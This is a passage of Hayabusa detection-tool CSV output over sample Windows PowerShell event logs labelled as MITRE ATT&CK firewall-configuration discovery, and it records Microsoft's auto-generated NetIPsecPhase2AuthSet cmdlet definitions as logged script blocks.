name=""Function""; value=""New-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.973 
+09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value 
= ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] 
[switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if 
($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
